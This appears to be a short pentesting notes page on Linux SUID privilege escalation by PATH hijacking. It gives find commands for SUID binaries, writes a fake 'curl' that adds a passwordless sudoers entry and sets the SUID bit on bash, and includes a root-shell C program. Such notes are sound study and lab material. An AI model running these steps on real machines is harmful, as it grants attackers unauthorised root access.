SUID
Last updated
Last updated
SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is run, the uid will be changed by the owner one. If the file owner is root, the uid will be changed to root even if it was executed from user bob. SUID bit is represented by an s.
â•â”€swissky@lab~ ╰─$ ls /usr/bin/sudo -alh -rwsr-xr-x 1root root 138K 23nov. 16:04/usr/bin/sudo
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
After finding SUID binaries, we should go to https://gtfobins.github.io/#+suid and search for the potential binary to follow the instructions to explote.
Identifying
If we have SUID perms in scripts owned by root we can try a PATH Hijacking
First of all we inspect the file:
ltrace {script}
strings {script} | less
Here if we notice that the script is executing a command without it's absolute path, we can start the attack.
Example: The script use curl and not /usr/bin/curl
Explotation
First of all we create a file with the same name as the tool used in the script.
Example: touch curl
Then we edit that file inserting the instruction we want to be executed:
echo "vry4n ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
chmod u+s /bin/bash
Also we can create and compile a binary (We will take service command as an example of used command without it's absolute path):
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > service.c
gcc service.c -o service
Now we manipulate the PATH to start searching from the directory we are in (directory in which we have the malicious file):
export PATH=.:$PATH
export PATH=/tmp:$PATH
Then when the script executes that command, it will use our malicious file cause it has the same name and is in the first directory of the PATH:
bash -p
Check sudo version and look after vulns for that specific version:
sudo --version
